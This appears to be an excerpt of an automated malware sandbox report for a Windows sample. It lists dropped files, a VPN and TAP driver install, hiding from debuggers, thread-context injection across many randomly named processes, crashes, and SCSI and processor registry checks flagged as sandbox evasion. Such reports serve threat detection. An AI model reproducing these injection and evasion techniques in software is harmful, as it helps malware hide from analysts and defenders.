C:\Windows\System32\DriverStore\Temp\{4c82a130-41c7-2043-81f8-ef19762eea42}\SET4415.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{4c82a130-41c7-2043-81f8-ef19762eea42}\SET4425.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{4c82a130-41c7-2043-81f8-ef19762eea42}\tap0901.sys DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{4c82a130-41c7-2043-81f8-ef19762eea42} DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{4c82a130-41c7-2043-81f8-ef19762eea42}\oemvista.inf DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{4c82a130-41c7-2043-81f8-ef19762eea42}\SET4426.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys DrvInst.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 17 IoCs
pid Process 5932 cmd.exe 2948 1068919.exe 2148 8018192.exe 6836 jNnKv6mul3RDLHYdVP9s8S4N.exe 472 v64oKiMH7HZN96MLrVZd7TYl.exe 6780 wGYNsb64ZBHISiHNwpu7Ju1A.exe 7056 izlZwVVv7MAPxS3UqznpIV6H.exe 5224 4100750.exe 4240 6080168.exe 1584 34D6.exe 8608 8F12.exe 6928 findstr.exe 6556 mask_svc.exe 4328 mask_svc.exe 9184 pNVeVdgmOmHhs4guZvikrayx.exe 5204 ScuYQUT_CwCQnZJOBp7bT9je.exe 7780 3556723.exe -
Suspicious use of SetThreadContext 19 IoCs
description pid Process procid_target PID 2224 set thread context of 1652 2224 Sai.exe.com 206 PID 5304 set thread context of 1700 5304 WerFault.exe 202 PID 6068 set thread context of 4160 6068 WerFault.exe 212 PID 6828 set thread context of 7876 6828 schtasks.exe 358 PID 3776 set thread context of 6540 3776 8k7lbjcfaEBIytDMvlzCVJxi.exe 366 PID 6880 set thread context of 3136 6880 ojg_nJibKClpW1PPkdFye6aG.exe 372 PID 7064 set thread context of 6404 7064 ab7eO_QtCg5f6ErhKa4OKp_v.exe 396 PID 1772 set thread context of 6984 1772 services64.exe 422 PID 7072 set thread context of 7480 7072 fp7oOqd_Hi5sCI0g6sN5Bg9_.exe 409 PID 5244 set thread context of 5896 5244 rtk3sX09oybmTouiBz9UXGd1.exe 442 PID 4076 set thread context of 8560 4076 wqNfeWN1CbcXKfDScHTgNm4g.exe 523 PID 7140 set thread context of 6768 7140 EC80.exe 526 PID 5748 set thread context of 5620 5748 Rimasta.exe.com 535 PID 4684 set thread context of 1152 4684 Rimasta.exe.com 544 PID 4376 set thread context of 3880 4376 5A93.exe 555 PID 6660 set thread context of 928 6660 QOvXrR4rlmLibLrwtK2IpbhQ.exe 637 PID 4076 set thread context of 8300 4076 wqNfeWN1CbcXKfDScHTgNm4g.exe 644 PID 3128 set thread context of 2016 3128 DQTI2Ix_7lKa3im0Xv6DxIG4.exe 661 PID 4596 set thread context of 1560 4596 msedge.exe 724 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\MaskVPN\MaskVPN.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-RPODR.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-BEDH0.tmp vpn.tmp File opened for modification C:\Program Files (x86)\SmartPDF\SmartPDF\Visit.url Setup.exe File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe ultramediaburner.tmp File opened for modification C:\Program Files (x86)\MaskVPN\libMaskVPN.dll vpn.tmp File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup_2.tmp File created C:\Program Files (x86)\MaskVPN\is-KI8I9.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-I8A20.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-94N1C.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-37K8N.tmp vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\unins000.dat vpn.tmp File opened for modification C:\Program Files (x86)\Vela Netw Limited\VCItems.dll schtasks.exe File opened for modification C:\Program Files (x86)\MaskVPN\ssleay32.dll vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-FU5R1.tmp vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\polstore.dll vpn.tmp File created C:\Program Files (x86)\MaskVPN\unins000.dat vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-KP0CF.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-M5MAR.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-QM7LU.tmp vpn.tmp File created C:\Program Files (x86)\UltraMediaBurner\is-B8UJQ.tmp ultramediaburner.tmp File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe schtasks.exe File opened for modification C:\Program Files (x86)\Vela Netw Limited\libcueify.dll schtasks.exe File created C:\Program Files (x86)\MaskVPN\driver\win732\is-8DBJ5.tmp vpn.tmp File created C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File opened for modification C:\Program Files (x86)\MaskVPN\libeay32.dll vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-A599K.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-74QRN.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-1TIAB.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-OE56S.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-F0RCN.tmp vpn.tmp File opened for modification C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe Setup.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe hibkxFCwwIU1jT3ewPqSHPZH.exe File created C:\Program Files (x86)\MaskVPN\is-OHI5Q.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-PACG4.tmp vpn.tmp File created C:\Program Files (x86)\FarLabUninstaller\Daesovewodi.exe 46807GHF____.exe File created C:\Program Files (x86)\Vela Netw Limited\unins000.dat schtasks.exe File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-SLMCB.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-9QU2K.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-J29D3.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-J0CCC.tmp vpn.tmp File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe E2HELBTaSyzUamWMspLwX6ce.exe File opened for modification C:\Program Files (x86)\Vela Netw Limited\unins000.dat schtasks.exe File created C:\Program Files (x86)\MaskVPN\driver\win732\is-8FH8V.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-CFU3R.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-S735H.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-MDUF4.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-TL88I.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-BREVC.tmp vpn.tmp File opened for modification C:\Program Files (x86)\Vela Netw Limited\ucrtbased.dll schtasks.exe File opened for modification C:\Program Files (x86)\MaskVPN\tunnle.dll vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\mask_svc.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-GODBF.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-V3RVJ.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-B1DK3.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-0U3U3.tmp vpn.tmp File created C:\Program Files (x86)\FarLabUninstaller\Daesovewodi.exe.config 46807GHF____.exe File created C:\Program Files (x86)\Vela Netw Limited\is-5LQ0D.tmp schtasks.exe File opened for modification C:\Program Files (x86)\MaskVPN\libCommon.dll vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\version MaskVPNUpdate.exe File created C:\Program Files (x86)\Vela Netw Limited\is-ML0F8.tmp schtasks.exe File opened for modification C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe vpn.tmp -
Drops file in Windows directory 55 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSI6E73.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF980746CA60664B88.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI6823.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6DD5.tmp msiexec.exe File created C:\Windows\Tasks\AdvancedWindowsManager #1.job LNV9uPcVinX2zN55WKga4plA.exe File opened for modification C:\Windows\INF\setupapi.dev.log svchost.exe File opened for modification C:\Windows\LOGS\DPX\setuperr.log 51F6.exe File created C:\Windows\inf\oem2.inf DrvInst.exe File opened for modification C:\Windows\Installer\MSIA882.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF120481CD2C384D81.TMP msiexec.exe File opened for modification C:\Windows\inf\oem2.inf DrvInst.exe File opened for modification C:\Windows\Installer\MSI6CBA.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File created C:\Windows\SystemTemp\~DF746B9E1E9472FB9A.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI19F2.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI64D.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6C99.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\f74dde5.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI7F2D.tmp msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File opened for modification C:\Windows\Installer\MSI3B38.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI5780.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF44F08AC4E2CF4D35.TMP msiexec.exe File created C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} msiexec.exe File created C:\Windows\SystemTemp\~DFFFFF80C97C15C0E6.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI2E46.tmp msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File opened for modification C:\Windows\Installer\MSI475E.tmp msiexec.exe File opened for modification C:\Windows\LOGS\DPX\setupact.log 51F6.exe File created C:\Windows\SystemTemp\~DF72AE619FD86224AB.TMP msiexec.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File opened for modification C:\Windows\Installer\MSI295A.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8C2E.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI2959.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6C79.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6F50.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI701C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7BDE.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI2253.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6E93.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIF4E7.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF18F399A782A30FC5.TMP msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log tapinstall.exe File created C:\Windows\SystemTemp\~DFF1DE764F2A4E3821.TMP msiexec.exe File opened for modification C:\Windows\Installer\f74dde5.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI6D86.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI696E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI10BE.tmp msiexec.exe File opened for modification C:\Windows\Installer\f74dde2.msi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI6E34.tmp msiexec.exe File created C:\Windows\Installer\f74dde2.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIE69D.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 53 IoCs
pid pid_target Process procid_target 5532 3812 WerFault.exe 94 5672 912 WerFault.exe 105 5452 1208 WerFault.exe 100 5440 3800 WerFault.exe 109 5396 6040 WerFault.exe 135 4720 4104 WerFault.exe 137 5940 4580 WerFault.exe 140 2272 1696 WerFault.exe 144 5680 3060 WerFault.exe 193 1312 4780 WerFault.exe 171 5492 5264 WerFault.exe 118 3448 4644 WerFault.exe 154 5272 6132 WerFault.exe 184 5304 4720 WerFault.exe 244 3156 4944 WerFault.exe 272 472 5744 WerFault.exe 261 6732 584 WerFault.exe 285 8172 3092 WerFault.exe 262 4312 7040 WerFault.exe 317 5744 7172 WerFault.exe 324 6500 1728 WerFault.exe 329 7144 6856 WerFault.exe 301 1944 6252 WerFault.exe 296 7648 6796 WerFault.exe 308 7120 1608 WerFault.exe 333 8124 6844 WerFault.exe 302 6256 3428 WerFault.exe 326 6676 6796 WerFault.exe 454 6720 8268 WerFault.exe 461 8308 7108 WerFault.exe 457 5400 8260 WerFault.exe 463 6768 8164 WerFault.exe 485 5764 7416 WerFault.exe 484 7980 6464 WerFault.exe 527 9176 2212 WerFault.exe 528 1360 6280 WerFault.exe 551 256 7504 WerFault.exe 561 3984 7136 WerFault.exe 568 3448 9020 WerFault.exe 501 7736 8888 WerFault.exe 572 5772 8652 WerFault.exe 489 2516 5756 WerFault.exe 604 7060 2372 WerFault.exe 607 2088 5712 WerFault.exe 628 7264 9144 WerFault.exe 620 9052 5900 WerFault.exe 619 7456 6968 WerFault.exe 618 1628 7392 WerFault.exe 624 4212 6352 WerFault.exe 625 3184 4940 WerFault.exe 672 8380 2004 WerFault.exe 670 4104 5436 WerFault.exe 681 5084 8592 WerFault.exe 691 -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&135B206D&0&010000 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\CompatibleIDs DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&135B206D&0&010000 tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Phantom DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Mfg svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\UpperFilters DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Phantom DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\ConfigFlags tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DQTI2Ix_7lKa3im0Xv6DxIG4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 svchost.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DQTI2Ix_7lKa3im0Xv6DxIG4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Filters DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Capabilities svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\DeviceDesc svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&135B206D&0&010000 tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\ConfigFlags svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI D83B.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000 tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Capabilities svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\DeviceDesc svchost.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI fp7oOqd_Hi5sCI0g6sN5Bg9_.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI D83B.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Service DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 svchost.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier msiexec.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msiexec.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 